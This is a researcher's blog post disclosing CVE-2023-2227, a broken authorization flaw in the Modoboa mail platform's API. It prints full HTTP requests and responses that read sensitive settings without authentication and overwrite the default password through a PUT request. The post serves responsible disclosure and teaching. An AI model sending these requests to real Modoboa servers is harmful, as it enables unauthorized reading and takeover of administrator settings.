Greeting esteemed readers!
It is with great enthusiasm that I convey to you a seminal revelation which I have unearthed in the domain of cybersecurity. Not long ago, I chanced upon a momentous vulnerability present in Modoboa, classified as CVE-2023–2227. Through this blog post, I shall engage in an in-depth analysis of the character of this vulnerability, the possible implications it may bring, and the measures that can be taken to counter its deleterious impact. Without further ado, let us commence our discourse.

CVE system serves as a critical instrument in the battle against cyber threats. It empowers security professionals to keep abreast of the latest vulnerabilities and work collectively to devise solutions that safeguard systems and data from cyber attacks. If you are a novice in the realm of cybersecurity, you may have encountered the terminology “CVE” and pondered its meaning. In its simplest form, CVE denotes Common Vulnerabilities and Exposures — a mechanism employed to recognize and trail established vulnerabilities in software and hardware systems. The CVE system designates an exclusive identifier to each vulnerability, thereby facilitating its tracing and referencing across diverse platforms.

For instance, the vulnerability cited earlier, CVE-2023–2227, represents a unique identifier assigned to a specific vulnerability that was unveiled in the year 2023. The maintenance of the CVE system falls under the aegis of the MITRE Corporation, a non-profit organization that administers research and development centers funded by the United States government. The corporation obtains vulnerability reports from various sources, including researchers, vendors, and security organizations, and allocates a CVE identifier to each vulnerability. What makes the CVE system consequential? By monitoring vulnerabilities and dispensing unique identifiers, the CVE system empowers security professionals to converse efficiently about security issues. It enables security researchers to exchange information about vulnerabilities, thereby facilitating the development and distribution of patches and updates to rectify these vulnerabilities.

Whilst conducting a comprehensive security assessment on open-source software, I deliberately selected Modoboa as the subject of my evaluation, being that it is an open-source mail server hosting and management platform, that proffers a user-friendly and intuitive web interface, enabling the effective management of diverse email-related functionalities including but not limited to domain creation, user account administration, email routing and filtering, among a plethora of other features.

For more: Read the official documentation ↓

About the Vulnerability

API1:2019 Broken Object Level Authorization | CWE-285: Improper Authorization

Broken Object Level Authorization (BOLA) is a common weakness found in web applications that rely on role-based access control to protect user data. It occurs when an application fails to properly check if a user has the right to access or modify a specific object or resource. This means that a user could access or modify data that they are not authorized to.

For example, a user could change the details of someone else’s account, view sensitive information, or make changes to system settings without permission. BOLA poses a serious security risk as it can lead to data breaches, theft of sensitive information, and other malicious activities. Attackers can exploit this weakness to gain unauthorized access to confidential data or escalate privileges to access critical systems. The Importance of Authorization in API Security have become an integral part of modern software development.

About my CVE (CVE-2023–2227)

Authorization determines whether a user or system has the right to access certain resources or perform certain actions. During testing, it was observed that sending a GET request to the following endpoint:

/api/v2/parameters/core/

returns sensitive information without any authentication or authorization (Affected Version: Modoboa 2.0.5)

Full Request:

GET /api/v2/parameters/core/ HTTP/1.1
Host: target
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 0
Connection: close

Corresponding Response:

HTTP/1.1 200 OK
Server: nginx/x.xx.x
Date: Sat, 25 Feb 2023 03:26:58 GMT
Content-Type: application/json
Content-Length: 1709
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en
{"label":"General","params":{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"password","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"[email protected]","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"[email protected]","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}}

The response conveyed confidential data that an attacker could exploit to obtain unauthorized entry to the system. This matter presents a notable threat to the privacy and accuracy of the system and those who use it.

{"label":"General","params":{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"password","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"[email protected]","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"[email protected]","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}}

Striving to amplify the level of intrigue

As a security researcher, it is imperative to ensure the integrity of data transmitted between client and server. In this regard, I tested the efficacy of the server-side validation mechanisms by modifying the JSON data via PUT request. To my amusement, the data was indeed altered at the server-side, indicating a vulnerability in the system’s validation mechanism.

As a part of my evaluation, I transmitted the modified JSON data back to the server via another Put request. This time, the system’s validation mechanism correctly identified the alteration and rejected the request. This observation highlights the importance of robust data validation mechanisms to ensure the integrity of data in transit. As security researchers, it is our responsibility to identify and report such vulnerabilities to safeguard against potential exploitation by malicious actors.

My second request

PUT /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1680
Connection: close
{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"[email protected]","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"[email protected]","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}

Response

HTTP/1.1 200 OK
Server: nginx/x.xx.x
Date: Sat, 25 Feb 2023 03:24:46 GMT
Content-Length: 0
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en

The alterations were executed directly within the administrative section. The impact of this vulnerability is severe, as it permits a malevolent assailant to obtain classified information and manipulate it, thus posing a substantial hazard to the security and coherence of the system as well as the data of its users. It is crucial to address this vulnerability without delay to thwart any subsequent exploitation by pernicious actors.

The administration segment of any system, being the epicenter of the application, is where all crucial operations are conducted. It is also the locus where vital information, such as user data, configuration data, and other critical data necessary for proper system functioning, is stored. Consequently, any vulnerability that permits an attacker to modify data within the administration segment poses a significant risk that must be dealt with immediately.

The ramifications of an administrative takeover can prove to be calamitous for a given system and its end-users, as the successful attainment of administrative privileges by an attacker enables them to exercise complete dominance over the entire system, thereby endowing them with unrestricted access to all data and resources.

0day to CVE

Upon my discovery and subsequent reporting of the bug, it has been assigned a Common Vulnerabilities and Exposures (CVE) identifier, signifying its recognition as a legitimate and potentially hazardous security vulnerability. Later, it has been published

Publication Link: https://nvd.nist.gov/vuln/detail/CVE-2023-2227

The issue fixed by adding missing permissions on API endpoints.

I trust that you have derived some measure of satisfaction from perusing this write-up, and I shall endeavor to furnish you with another engaging and thought-provoking composition in the not-too-distant future.

Click here to connect with me → 7h3h4ckv157

• Connect through Twitter
• Connect through LinkedIn